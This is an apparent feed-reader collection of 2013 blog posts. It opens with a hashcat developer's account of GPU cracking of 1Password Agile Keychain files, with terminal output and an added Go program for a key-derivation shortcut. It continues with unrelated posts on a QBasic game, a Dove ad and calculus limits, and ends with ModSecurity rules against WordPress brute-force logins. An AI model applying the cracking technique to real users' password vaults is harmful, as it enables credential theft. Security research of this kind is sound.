This week I finally finished the first milestone, the hashing part of TrueCrypt. That is PBKDF2-HMAC-Whirlpool, -RipeMD160 and -SHA512. Unfortunately there is another milestone. To finally crack TrueCrypt, you have to decrypt a 448 byte block of data using AES, Serpent or Twofish or some obscure combinations of them. The important word here is AES. To finish support for efficiently cracking TrueCrypt there is no way around adding AES to GPU. Problem is, I never used AES before and it was a totally new world for me.

How to start digging into AES? I thought the best way was to combine the learning phase with something that uses AES and so add some nice new algorithm. At this time, some guy posted a request on the hashcat forum asking for support to crack the 1Password Agilebits keychain. Guess what, it uses AES :)

I did not pay much attention to Agilebits 1Password before. I was happy with keepass and never thought about changing. I quickly downloaded the tool and was impressed how easily it worked. It installed without problems, has nice icons, seemed to be very intuitive and there is also browser integration, so I thought I should finally move from keepass to 1Password.

However, that's the story so far of why I started to add 1Password to oclHashcat-plus. So I started to dig into AES and experimented a bit with it and the 1Password keychain. I finally got it working and then ported it to GPU. So what you see here is the world's first 100% GPU implementation of the 1Password keychain.

There are other solutions out but they are using CPU to do the AES part.

Quote:
root@sf:~/oclHashcat# ./oclHashcat-plus64.bin -m 6600 testhash2 -a 3 ?l?l?l?l?l?l?l! -u 1000 -n 128
oclHashcat-plus v0.15 by atom starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Workload: 1000 loops, 128 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Cayman, 1024MB, 830Mhz, 24MCU
Device #2: Cayman, 1024MB, 830Mhz, 24MCU
Device #3: Cayman, 1024MB, 830Mhz, 24MCU
Device #4: Cayman, 1024MB, 830Mhz, 24MCU
Device #1: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #2: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #3: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #4: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)

testhash2:hashcat!

Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l?l?l!)
Hash.Target....: File (testhash2)
Hash.Type......: 1Password Agile Keychain
Time.Started...: Tue Apr 16 15:30:55 2013 (7 mins, 3 secs)
Speed.GPU.#1...: 744.0k/s
Speed.GPU.#2...: 744.0k/s
Speed.GPU.#3...: 743.9k/s
Speed.GPU.#4...: 743.5k/s
Speed.GPU.#*...: 2975.5k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1257111552/8031810176 (15.65%)
Rejected.......: 0/1257111552 (0.00%)
HWMon.GPU.#1...: 99% Util, 59c Temp, 29% Fan
HWMon.GPU.#2...: 99% Util, 64c Temp, N/A Fan
HWMon.GPU.#3...: 99% Util, 58c Temp, 29% Fan
HWMon.GPU.#4...: 99% Util, 55c Temp, N/A Fan

Started: Tue Apr 16 15:30:55 2013
Stopped: Tue Apr 16 15:38:00 2013

As you can see, oclHashcat-plus is running with nearly 3Mhash/s using my two hd6990's which is ~ the speed of two hd7970 (a bit faster).

The reason for the high speed is what I think might be a design flaw. Here is why:

1Password uses PBKDF2-HMAC-SHA1 to derive a 256 bit key. Actually we are generating a 320 bit key using PBKDF2-HMAC-SHA1 this way but it's then truncated to 256 bit. No problem so far, many algorithms like WPA are doing the same thing.

The PBKDF2-HMAC-SHA1 part is what makes the entire calculation slow. For each iteration of PBKDF2-HMAC-SHA1 you call 4 times the SHA1 transform. But this is only to produce a 160 bit key. To produce the required 320 bit key, you call it 8 times. So if you have 1000 iterations, you call it 8000 times. Due to some simple optimizations you can do with HMAC you can precompute ipad and opad, so you end up in 2 + (2 * iterations) = 2002 for 160 bit or 4004 calls to SHA1 transform for 320 bit.

1Password then uses AES in CBC mode to decrypt 1040 bytes of data. To be exact, it takes the first 128 bit of the derived key to set up the AES key and takes another 128 bit as an IV for the CBC.

The goal is to match the final padding block of the decrypted 1040 bytes of data. If you find the last four 32-bit integers at 0x10101010 the padding is correct and you know your key was correct.

In CBC mode, you take the IV only for the first decryption. You then replace it with the ciphertext of the current block (which is then used for the next block).

But if you take a close look now you see that both of these mechanisms do not match in combination. To find out if the masterkey is correct, all we need is to match the padding, so all we need to satisfy the CBC is the previous 16 bytes of data of the 1040 byte block. These 16 bytes of data are provided in the keychain! In other words, there is no need to calculate the IV at all. Instead of calculating a 256 bit key in the PBKDF2, we just need to calculate 128 bit. Since SHA1 gives us 160 bit, we can save exactly twice the number of calls to the sha1 transform. This way I was able to reduce the calls to SHA1 transform from 8000 to 2002 :)

Stay tuned for oclHashcat-plus v0.15!
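As an added illustration of the argument above (this is not atom's or hashcat's code): a stand-alone Go program that builds a sample blob in the layout the post describes (PBKDF2-HMAC-SHA1 output of 320 bits, AES key from the first 128, CBC IV from the next 128, 1024 data bytes plus one full padding block) and then verifies a password guess both the naive way and the way the post describes. The iteration count, salt, password and data are constructed assumptions; parsing of the real keychain file is not part of it.

```go
// Added example (not hashcat's code nor atom's): a stand-alone model of the
// cost argument above, using the keychain layout the post describes.
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"fmt"
)

const iterations = 1000 // assumed iteration count for the constructed sample

// pbkdf2SHA1 derives blocks*20 bytes with PBKDF2-HMAC-SHA1 (RFC 8018) and also
// returns the number of HMAC evaluations, i.e. what one guess costs an attacker.
func pbkdf2SHA1(password, salt []byte, iters, blocks int) ([]byte, int) {
	var dk []byte
	calls := 0
	mac := hmac.New(sha1.New, password)
	for i := 1; i <= blocks; i++ {
		mac.Reset()
		mac.Write(salt)
		mac.Write([]byte{byte(i >> 24), byte(i >> 16), byte(i >> 8), byte(i)}) // INT(i)
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for j := 1; j < iters; j++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		calls += iters
		dk = append(dk, t...)
	}
	return dk, calls
}

// buildKeychain constructs a sample blob laid out as the post describes: PBKDF2
// output of 320 bits, AES key = bytes 0..15, CBC IV = bytes 16..31, then 1024
// data bytes followed by one full PKCS#7 padding block, 1040 bytes in total.
func buildKeychain(password, salt, data []byte) []byte {
	dk, _ := pbkdf2SHA1(password, salt, iterations, 2)
	block, err := aes.NewCipher(dk[:16])
	if err != nil || len(data)%aes.BlockSize != 0 {
		panic("sample data must be a whole number of AES blocks")
	}
	padded := append(append([]byte(nil), data...), bytes.Repeat([]byte{16}, 16)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, dk[16:32]).CryptBlocks(out, padded)
	return out
}

// lastBlockPadding decrypts only the final CBC block and returns its PKCS#7 pad
// length (0 if invalid). P_n = AES^-1(K, C_n) XOR C_{n-1}: the IV never enters
// this computation, so no derived key material beyond the AES key is needed.
func lastBlockPadding(aesKey, blob []byte) int {
	block, err := aes.NewCipher(aesKey)
	n := len(blob)
	if err != nil || n < 2*aes.BlockSize || n%aes.BlockSize != 0 {
		return 0
	}
	last := make([]byte, aes.BlockSize)
	block.Decrypt(last, blob[n-aes.BlockSize:])
	for i, c := range blob[n-2*aes.BlockSize : n-aes.BlockSize] {
		last[i] ^= c
	}
	pad := int(last[aes.BlockSize-1])
	if pad < 1 || pad > aes.BlockSize ||
		!bytes.Equal(last[aes.BlockSize-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return 0
	}
	return pad
}

// verifyGuess tests a candidate password. full=true derives all 320 bits, as a
// naive implementation would; full=false derives one 160-bit block and uses only
// its first 128 bits as the AES key. Same verdict, half the HMAC calls.
func verifyGuess(guess, salt, blob []byte, full bool) (bool, int) {
	blocks := 1
	if full {
		blocks = 2
	}
	dk, calls := pbkdf2SHA1(guess, salt, iterations, blocks)
	return lastBlockPadding(dk[:16], blob) == aes.BlockSize, calls
}

func main() {
	salt := []byte("constructed-salt") // constructed sample, not real keychain data
	blob := buildKeychain([]byte("hashcat!"), salt, bytes.Repeat([]byte("A"), 1024))
	for _, guess := range []string{"hashcat!", "wrong"} {
		okFull, nFull := verifyGuess([]byte(guess), salt, blob, true)
		okFast, nFast := verifyGuess([]byte(guess), salt, blob, false)
		fmt.Printf("%-10q full: %5v (%d HMACs)  shortcut: %5v (%d HMACs)\n",
			guess, okFull, nFull, okFast, nFast)
	}
}
```

For a format designer the takeaway is the inverse of the post's trick: whatever the verifier checks should depend on every byte of the derived key, otherwise an attacker only pays for the prefix the check touches.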

17 Apr 02:20

The best QBasic game ever?

What's the most difficult thing you did in the last year?  Now stop. Before you answer, can it compare to creating a full-fledged indie game—slated to be approved on Steam—created entirely with QBASIC? Probably not.

QBASIC is a software interpreter for the BASIC programming language that showed up in 1991, and basic it is. Here's a little video of a game created by IBM to show off the awesome power of QBASIC when it first launched:

You get the idea after about 45 seconds. Now, over 20 years later—but with the exact same programming tools—we have Black Annex. Check out this trailer with actual gameplay—and I can't say it enough—using the same programming language that the above video was "showing off."

Not only are the simple visuals awesome, but the gameplay actually looks complex and tough to master—not something you'd expect from a programming language with simple loops and statements.

It's an isometric corporate sabotage and infiltration game. What that means exactly I'm not sure but you can choose your own playstyle and outfit agents to "steal, destroy, kidnap and kill" as you wish.


But why QBASIC when there are so many other powerful tools out there that would probably be simpler to use? Lance McDonald, the game's creator, hearkened back to when he made games as a kid with QBASIC and wanted to make a love letter to the great games of the '90s.

"When I sat down to make Black Annex a year ago, I didn't want to 'learn' how to make a game—I realized I already knew how to make a game. I just had to go back to the tools I knew" McDonald said. He also mentioned that he mailed a QBASIC game to Epic MegaGames when he was 9 and never heard back. He had something to prove.


Black Annex was just announced last week and has already gained a lot of steam (pun intended) on Steam's Greenlight program, where users can vote on smaller games they'd like to see made available for purchase on the Steam platform.

"It would be amazing for the game development community," said McDonald when asked about Black Annex's potential ascension to Steam. "It would show that even old, abandoned tools and the most basic pieces of software can still be put in the hands of someone who wants to create their dream and result in beautiful things happening."

A couple more fun facts about the game:

  • Black Annex requires at least a 2.6GHz processor due to the scope of the project and the unoptimized multi-dimensional arrays.
  • The game's catchy tune is by Abducted by Sharks
  • It will support mods (meaning customized missions, levels, etc.)
  • The game is a 12000 line .bas (BASIC) file. Yeesh!

17 Apr 07:16

Criminal Sketch Artist Draws Women as They See Themselves and as Others See Them

Gil Zamora is an FBI-trained forensics artist with over 3,000 criminal sketches under his belt. Dove and Ogilvy Brazil hired him to interview and draw seven different women—two sketches of each. The first sketch was based on each woman's personal description of herself. The second was based on a description provided by a stranger the woman had just met. Of course, the differences are vast. Watching these women come face to face with the version of themselves in their mind and the version everyone else sees is extraordinary. It's one of the most original and touching experiments to come from the Campaign for Real Beauty in ages, because instead of making faux protests or annoying graphic designers with bullshit filters, they're actually empowering individual women to appreciate their inherent beauty, and in turn, allowing us all to wonder if we've been judging ourselves too harshly. Like all of the best work, the commercial elements are barely there. Beyond the logo, Dove doesn't even attempt to sell soap. Watch the documentary below, and mini-videos of selected women on the web site. Then enjoy the rousing comments section, where people are already attacking Dove for choosing too many skinny, white chicks.

CREDITS
Client: Dove
Agency: Ogilvy & Mather Brazil
Chief Creative Officer: Anselmo Ramos
Executive Creative Director: Roberto Fernandez /Paco Conde
AD: Diego Machado
CW: Hugo Veiga
Sketch Artist: Gil Zamora
Producer: Veronica Beach
Junior Producer: Renata Neumann
Business Manager: Libby Fine
CEO: Luis Fernando Musa
Group Account Director: Valeria Barone
Account Director: Ricardo Honegger

Production Company: Paranoid US
Director: John X Carey
Executive Producer: Jamie Miller / Claude Letessier
Line Producer: Stan Sawicki
Director of Photography: Ed David

—Long Version
Executive Producer: Jamie Miller / Claude Letessier
Producer: Stan Sawicki
Editor: Phillip Owens
Music: Subtractive
Sound mix: Lime Studio
Composer: Keith Kenniff
Mixer: Sam Casas
Executive Producer: Jessica Locke
Production Sound: Tim O’Malley
Color Grading: Company 3
Colorist: Sean Coleman

—Short Version and Cinema
Editorial Company: Rock Paper Scissor
Executive Producer: Carol Lynn Weaver
Editor: Paul Kumpata
Assistant Editor: Niles Howard
Online: A52
Executive Producer: Megan Meloth
Producer: Jamie McBriety
Music: Subtractive
Composer: Keith Kenniff
Sound mix: Lime Studio
Mixer: Sam Casas
Executive Producer: Jessica Locke
Production Sound: Tim O’Malley
Color Grading: Company 3
Colorist: Sean Coleman

16 Apr 05:00

The Millionaire Next Door. . . An Academic Entrepreneur

Two recently published articles caught my attention.  And, bear with me, they are related!  In the first one, Bob Dudley, the well respected CEO of BP, is quoted: 

Employment is difficult in many places.  But anybody who goes through petroleum engineering, chemical engineering there will be jobs for them. . . . they will have phenomenal opportunities.

In past blogs, as well as in Stop Acting Rich, I have mentioned that engineers in general are quite productive in transforming income into wealth.  Even more productive are professors who teach petroleum engineering, chemical engineering, mining engineering, etc.

The second article deals with the concept of substituting computer software for humans in grading essay exams.  After reading this, I had a hollow feeling in my gut because my choice of becoming a professor was initially stimulated by my experiences grading essay exams.  During my first year in a master's program a senior faculty asked me:  "Do you want to make some extra money?  I need you to grade some midterm exams." I accepted the offer, and I was delighted with my new task.  Part of the job description was to read the textbook thoroughly in order to evaluate the essays.  Essentially I was paid to improve my knowledge and understanding of the subject matter in my chosen field.  It is the same way with teaching.  Later, as a professor, I was compensated for constantly learning and disseminating knowledge via lectures, published papers and books. 

Some in education complain about "the agony and hard work associated with publishing."  But publishing is a way to prove to yourself and others that you are a scholar.  Publishing enhances your reputation as an expert and leading authority.  By doing so you, your university and your students all benefit from such achievements.

A good number of professors can be classified as academic entrepreneurs.  As an example, consider Dr. David Schwartz, one of my early mentors.  His book, The Magic of Thinking Big, sold over 3 million copies, the audio version over 11 million.  He also wrote two successful textbooks.  Dave received more  than 200 offers per year to give speeches and training seminars independent of the university.  Yet he never made a sales call; he never had to. 

In Selling to the Affluent, I mentioned that

There is a significant number of David types in our academic communities.  In fact, according to the National Science Foundation, more than 3,000 engineering and science professors . . . own companies independent of their respective universities.

There are tremendous employment opportunities for those who have a degree in petroleum and chemical engineering.  But I also think there is a greater opportunity for those who teach these subjects.  It's not easy to spend 3 more years earning a Ph.D.  But those among them who become academic entrepreneurs can write their own ticket to success.  This assumes that professors will not be replaced with software driven robots!

15 Apr 17:11

An Intuitive Introduction To Limits

by kalid

Limits, the Foundations Of Calculus, seem so artificial and weasely: “Let x approach 0, but not get there, yet we’ll act like it’s there… ” Ugh. Here’s how I learned to enjoy them:

  • What is a limit? Our best prediction of a point we didn’t observe.
  • How do we make a prediction? Zoom into the neighboring points. If our prediction is always in-between neighboring points, no matter how much we zoom, that’s our estimate.
  • Why do we need limits? Math has “black hole” scenarios (dividing by zero, going to infinity), and limits give us a reasonable estimate.
  • How do we know we’re right? We don’t. Our prediction, the limit, isn’t required to match reality. But for most natural phenomena, it sure seems to.

Limits let us ask “What if?”. If we can directly observe a function at a value (like x=0, or x growing infinitely), we don’t need a prediction. The limit wonders, “If you can see everything except a single value, what do you think is there?”.

When our prediction is consistent and improves the closer we look, we feel confident in it. And if the function behaves smoothly, like most real-world functions do, the limit is where the missing point must be.

Key Analogy: Predicting A Soccer Ball

Pretend you’re watching a soccer game. Unfortunately, the connection is choppy:


Ack! We missed what happened at 4:00. Even so, what’s your prediction for the ball’s position?

Easy. Just grab the neighboring instants (3:59 and 4:01) and predict the ball to be somewhere in-between.

And… it works! Real-world objects don’t teleport; they move through intermediate positions along their path from A to B. Our prediction is “At 4:00, the ball was between its position at 3:59 and 4:01”. Not bad.

With a slow-motion camera, we might even say “At 4:00, the ball was between its positions at 3:59.999 and 4:00.001”.

Our prediction is feeling solid. Can we articulate why?

  • The predictions agree at increasing zoom levels. Imagine the 3:59-4:01 range was 9.9-10.1 meters, but after zooming into 3:59.999-4:00.001, the range widened to 9-12 meters. Uh oh! Zooming should narrow our estimate, not make it worse! Not every zoom level needs to be accurate (imagine seeing the game every 5 minutes), but to feel confident, there must be some threshold where subsequent zooms only strengthen our range estimate.

  • The before-and-after agree. Imagine at 3:59 the ball was at 10 meters, rolling right, and at 4:01 it was at 50 meters, rolling left. What happened? We had a sudden jump (a camera change?) and now we can’t pin down the ball’s position. Which one had the ball at 4:00? This ambiguity shatters our ability to make a confident prediction.

With these requirements in place, we might say “At 4:00, the ball was at 10 meters. This estimate is confirmed by our initial zoom (3:59-4:01, which estimates 9.9 to 10.1 meters) and the following one (3:59.999-4:00.001, which estimates 9.999 to 10.001 meters)”.

Limits are a strategy for making confident predictions.

Exploring The Intuition

Let’s not bring out the math definitions just yet. What things, in the real world, do we want an accurate prediction for but can’t easily measure?

What’s the circumference of a circle?

Finding pi “experimentally” is tough: bust out a string and a ruler?

We can’t measure a shape with seemingly infinite sides, but we can wonder “Is there a predicted value for pi that is always accurate as we keep increasing the sides?”

Archimedes figured out that pi had a range of

\displaystyle{3 \frac{10}{71} < \pi < 3 \frac{1}{7} }

using a process like this:

It was the precursor to calculus: he determined that pi was a number that stayed between his ever-shrinking boundaries. Nowadays, we have modern limit definitions of pi.

What does perfectly continuous growth look like?

e, one of my favorite numbers, can be defined like this:

\displaystyle{e = \lim_{n\to\infty} \left( 1 + \frac{1}{n} \right)^n}

We can’t easily measure the result of infinitely-compounded growth. But, if we could make a prediction, is there a single rate that is ever-accurate? It seems to be around 2.71828…

Can we use simple shapes to measure complex ones?

Circles and curves are tough to measure, but rectangles are easy. If we could use an infinite number of rectangles to simulate curved area, can we get a result that withstands infinite scrutiny? (Maybe we can find the area of a circle.)

Can we find the speed at an instant?

Speed is funny: it needs a before-and-after measurement (distance traveled / time taken), but can’t we have a speed at individual instants? Hrm.

Limits help answer this conundrum: predict your speed when traveling to a neighboring instant. Then ask the “impossible question”: what’s your predicted speed when the gap to the neighboring instant is zero?

Note: The limit isn’t a magic cure-all. We can’t assume one exists, and there may not be an answer to every question. For example: Is the number of integers even or odd? The quantity is infinite, and neither the “even” nor “odd” prediction stays accurate as we count higher. No well-supported prediction exists.

For pi, e, and the foundations of calculus, smart minds did the proofs to determine that “Yes, our predicted values get more accurate the closer we look.” Now I see why limits are so important: they’re a stamp of approval on our predictions.

The Math: The Formal Definition Of A Limit

Limits are well-supported predictions. Here’s the official definition:

\displaystyle{ \lim_{x \to c}f(x) = L } means for all real ε > 0 there exists a real δ > 0 such that for all x with 0 < |x − c| < δ, we have |f(x) − L| < ε.

Let’s make this readable:

Math English                                      Human English
\displaystyle{ \lim_{x \to c}f(x) = L } means     When we “strongly predict” that f(c) = L, we mean
for all real ε > 0                                for any error margin we want (+/- .1 meters)
there exists a real δ > 0                         there is a zoom level (+/- .1 seconds)
such that for all x with 0 < |x − c| < δ,         where the prediction stays accurate
|f(x) − L| < ε                                    to within the error margin

There’s a few subtleties here:

  • The zoom level (delta, δ) is the function input, i.e. the time in the video
  • The error margin (epsilon, ε) is the most the function output (the ball’s position) can differ from our prediction throughout the entire zoom level
  • The absolute value condition (0 < |x − c| < δ) means positive and negative offsets must work, and we’re skipping the black hole itself (when |x – c| = 0).

We can’t evaluate the black hole input, but we can say “Except for the missing point, the entire zoom level confirms the prediction f(c) = L.” And because f(c) = L holds for any error margin we can find, we feel confident.

Could we have multiple predictions? Imagine we predicted L1 and L2 for f(c). There’s some difference between them (call it .1), therefore there’s some error margin (.01) that would reveal the more accurate one. Every function output in the range can’t be within .01 of both predictions. We either have a single, infinitely-accurate prediction, or we don’t.

Yes, we can get cute and ask for the “left hand limit” (prediction from before the event) and the “right hand limit” (prediction from after the event), but we only have a real limit when they agree.

A function is continuous when it always matches the predicted value (and discontinuous if not):

\displaystyle{\lim_{x \to c}{f(x)} = f(c)}

Calculus typically studies continuous functions, playing the game “We’re making predictions, but only because we know they’ll be correct.”

The Math: Showing The Limit Exists

We have the requirements for a solid prediction. Questions asking you to “Prove the limit exists” ask you to justify your estimate.

For example: Prove the limit at x=2 exists for

\displaystyle{f(x) = \frac{(2x+1)(x-2)}{(x - 2)}}

The first check: do we even need a limit? Unfortunately, we do: just plugging in x = 2 means we have a division by zero. Drats.

But intuitively, we see the same “zero” (x – 2) could be cancelled from the top and bottom. Here’s how to dance this dangerous tango:

  • Assume x is anywhere except 2 (It must be! We’re making a prediction from the outside.)
  • We can then cancel (x – 2) from the top and bottom, since it isn’t zero.
  • We’re left with f(x) = 2x + 1. This function can be used outside the black hole.
  • What does this simpler function predict? That f(2) = 2*2 + 1 = 5.

So f(2) = 5 is our prediction. But did you see the sneakiness? We pretended x wasn’t 2 [to divide out (x-2)], then plugged in 2 after that troublesome item was gone! Think of it this way: we used the simple behavior from outside the event to predict the gnarly behavior at the event.

We can prove these shenanigans give a solid prediction, and that f(2) = 5 is infinitely accurate.

For any accuracy threshold (ε), we need to find the “zoom range” (δ) where we stay within the given accuracy. For example, can we keep the estimate between +/- 1.0?

Sure. We need to find out where

\displaystyle{|f(x) - 5| < 1.0}

so


\begin{align*}
|2x + 1 - 5| &< 1.0 \\
|2x - 4| &< 1.0 \\
|2(x - 2)| &< 1.0 \\
2|(x - 2)| &< 1.0 \\
|x - 2| &< 0.5
\end{align*}

In other words, x must stay within 0.5 of 2 to maintain the initial accuracy requirement of 1.0. Indeed, when x is between 1.5 and 2.5, f(x) goes from f(1.5) = 4 to f(2.5) = 6, staying within +/- 1.0 of our predicted value of 5.

We can generalize to any error tolerance (ε) by plugging it in for 1.0 above. We get:

\displaystyle{|x - 2| < 0.5 \cdot \epsilon}

If our zoom level is “δ = 0.5 * ε”, we’ll stay within the original error. If our error is 1.0 we need to zoom to .5; if it’s 0.1, we need to zoom to 0.05.
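The same algebra with a general ε in place of 1.0, carried through here as an added step rather than quoted from the original:

\begin{align*}
|f(x) - 5| &< \epsilon \\
|2x + 1 - 5| &< \epsilon \\
2|x - 2| &< \epsilon \\
|x - 2| &< \frac{\epsilon}{2}
\end{align*}

So taking δ = ε/2 gives |f(x) − 5| < ε for every x with 0 < |x − 2| < δ, which is precisely the ε-δ definition with c = 2 and L = 5.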

This simple function was a convenient example. The idea is to start with the initial constraint (|f(x) – L| < ε), plug in f(x) and L, and solve for the distance away from the black-hole point (|x – c| < ?). It’s often an exercise in algebra.

Sometimes you’re asked to simply find the limit (plug in 2 and get f(2) = 5), other times you’re asked to prove a limit exists, i.e. crank through the epsilon-delta algebra.

Flipping Zero and Infinity

Infinity, when used in a limit, means “grows without stopping”. The symbol ∞ is no more a number than the sentence “grows without stopping” or “my supply of underpants is dwindling”. They are concepts, not numbers (for our level of math, Aleph me alone).

When using ∞ in a limit, we’re asking: “As x grows without stopping, can we make a prediction that remains accurate?”. If there is a limit, it means the predicted value is always confirmed, no matter how far out we look.

But, I still don’t like infinity because I can’t see it. But I can see zero. With limits, you can rewrite

\displaystyle{\lim_{x \to \infty}}

as

\displaystyle{\lim_{\frac{1}{x} \to 0}}

You can get sneaky and define y = 1/x, replace items in your formula, and then use

\displaystyle{\lim_{y \to 0^+}}

so it looks like a normal problem again! (Note from Tim in the comments: the limit is coming from the right, since x was going to positive infinity). I prefer this arrangement, because I can see the location we’re narrowing in on (we’re always running out of paper when charting the infinite version).
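Applied to the definition of e from earlier in the post (an added illustration using the same substitution, not part of the original):

\displaystyle{ e = \lim_{x \to \infty} \left( 1 + \frac{1}{x} \right)^x = \lim_{y \to 0^+} \left( 1 + y \right)^{1/y} }

With y = 1/x, the variable that “grows without stopping” becomes a quantity shrinking to zero from the right, and the exponent 1/y is where the infinity went.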

Why Aren’t Limits Used More Often?

Imagine a kid who figured out that “Putting a zero on the end” made a number 10x larger. Have 5? Write down “5” then “0” to get 50. Have 100? Make it 1000. And so on.

He didn’t figure out why multiplication works, or why this rule is justified… but, you’ve gotta admit, he sure can multiply by 10. Sure, there are some edge cases (Would 0 become “00”?), but it works pretty well.

The rules of calculus were discovered informally (by modern standards). Newton deduced that “The derivative of x^3 is 3x^2” without rigorous justification. Yet engines whirl and airplanes fly based on his unofficial results.

The calculus pedagogy mistake is creating a roadblock like “You must know Limits™ before appreciating calculus”, when it’s clear the inventors of calculus didn’t. I’d prefer this progression:

  • Calculus asks seemingly impossible questions: When can rectangles measure a curve? Can we detect instantaneous change?
  • Limits give a strategy for answering “impossible” questions (“If you can make a prediction that withstands infinite scrutiny, we’ll say it’s ok.”)
  • They’re a great tag-team: Calculus explores, limits verify. We memorize shortcuts for the results we verified with limits (d/dx x^3 = 3x^2), just like we memorize shortcuts for the rules we verified with multiplication (adding a zero means times 10). But it’s still nice to know why the shortcuts are justified.

Limits aren’t the only tool for checking the answers to impossible questions; infinitesimals work too. The key is understanding what we’re trying to predict, then learning the rules of making predictions.

Happy math.

16 Apr 18:09

Defending WordPress Logins from Brute Force Attacks

by Ryan Barnett
As has been reported by many news outlets, WordPress login pages have been under a heavy brute force attack campaign, another method of recruiting web servers into botnets. There are a number of methods which can be used to help mitigate these attacks, including:

While all of these defenses are good, and I encourage WP users to implement them, I also wanted to show how the ModSecurity WAF can be used to protect WP logins, as many hosting providers already run it as part of their infrastructure. With ModSecurity v2.7.3, users can add example rules like the ones below to Apache .htaccess files to implement custom rules.

Profiling WordPress Login Attempts

When a real user submits the WordPress login form, the raw HTTP request sent to the wp-login.php page looks similar to this:

POST /wordpress/wp-login.php HTTP/1.1 
Host: mywordpress.com 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; q=0.8 
Accept-Language: en-us,en;q=0.5 
DNT: 1 
Referer: http://mywordpress.com/wordpress/wp-login.php 
Content-Type: application/x-www-form-urlencoded
Via: 1.1 owaspbwa.localdomain 
Connection: Keep-Alive 
Content-Length: 73

log=administrator&pwd=pass123&submit=Login+%C2%BB&redirect_to=wp-admin%2F

Now that we see how the WordPress login request looks, we can create the following rules to help protect it from unauthorized access.

Check Referer Field

When normal users log into WordPress, the browser includes a Referer header because the request is generated by submitting the login form served from the wp-login.php page. Many of these botnet brute force attacks, however, send POST login requests directly to wp-login.php without ever loading the form. We can therefore create this quick ModSecurity ruleset to enforce the existence of the Referer header:

SecRule REQUEST_METHOD "@streq POST" "chain,id:'1',phase:2,t:none,block,log,msg:'Warning: Direct Login Missing Referer.'"
  SecRule REQUEST_FILENAME "@pm /wp-login.php /wp-admin/" "chain"
    SecRule &REQUEST_HEADERS:Referer "@eq 0"

This type of security check is weak of course, as a Referer header could easily be added to the botnet attack scripts. It also has a false-positive cost: browsers and privacy extensions that strip the Referer header will be unable to log in, so watch the audit log after enabling it.

Restrict Allowed IP Addresses

If you do not change your administrator account name, you can still add an extra layer of security by only allowing the admin account to log in from your own IP address. Here is an example ruleset:

SecRule REQUEST_METHOD "@streq POST" "chain,id:'2',phase:2,t:none,block,log,msg:'Warning: Admin login attempt from unauthorized IP address.'"
  SecRule REQUEST_FILENAME "@pm /wp-login.php /wp-admin/" "chain"
    SecRule ARGS:log "@streq admin" "chain"
      SecRule REMOTE_ADDR "!@ipMatch 72.192.214.223"

In this example, the "admin" user will only be allowed to log in from 72.192.214.223 (of course you would need to specify your own IP address). Note that the rule id must differ from the Referer rule above, since ModSecurity refuses to load duplicate ids. If the site sits behind a reverse proxy or CDN, REMOTE_ADDR will be the proxy's address, so the check would need to be based on the forwarded client address instead.

Tracking Failed Admin Login Attempts

With ModSecurity's persistent IP collection data, we can track the number of failed login attempts for the admin account and then temporarily block the client IP address. Here is the example response returned when a user fails a WordPress login attempt:

HTTP/1.1 200 OK 
Date: Fri, 11 May 2012 03:24:53 GMT 
Server: Apache 
Expires: Wed, 11 Jan 1984 05:00:00 GMT 
Last-Modified: Fri, 11 May 2012 03:24:54 GMT 
Cache-Control: no-cache, must-revalidate, max-age=0 
Pragma: no-cache 
Vary: Accept-Encoding 
Content-Length: 1697 
Connection: close 
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>WordPress &rsaquo; Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<link rel="stylesheet" href="http://192.168.1.113/wordpress/wp-admin/wp-admin.css" type="text/css" /> <script type="text/javascript"> function focusit() {
document.getElementById('log').focus();
} window.onload = focusit; </script>
</head> <body>
<div id="login"> <h1><a href="http://wordpress.org/">WordPress</a></h1> <div id='login_error'>
<strong>Error</strong>: Incorrect password. </div> 
... 
</body> 
</html>

As you can see, the HTTP response status code is 200 OK and there is text in the HTML body indicating that the user supplied an incorrect password. Two prerequisites for matching on it: response body inspection must be enabled (SecResponseBodyAccess On, with text/html included in SecResponseBodyMimeType), and the ip collection must have been initialized earlier with initcol:ip=%{REMOTE_ADDR} (the CRS setup file does this). We can now create rules to identify repeated failures:

SecRule REQUEST_FILENAME "@streq /wordpress/wp-login.php" "chain,phase:4,id:999323,t:none,block,msg:'Authentication Failure Violation.',logdata:'Number of Authentication Failures: %{ip.failed_auth_attempt}'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS:log "@streq admin" "chain"
      SecRule RESPONSE_STATUS "200" "chain"
        SecRule RESPONSE_BODY "@contains <strong>Error</strong>: Incorrect password." "chain,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
          SecRule IP:FAILED_AUTH_ATTEMPT "@gt 5"

Detecting a High Number of Authentication Attempts

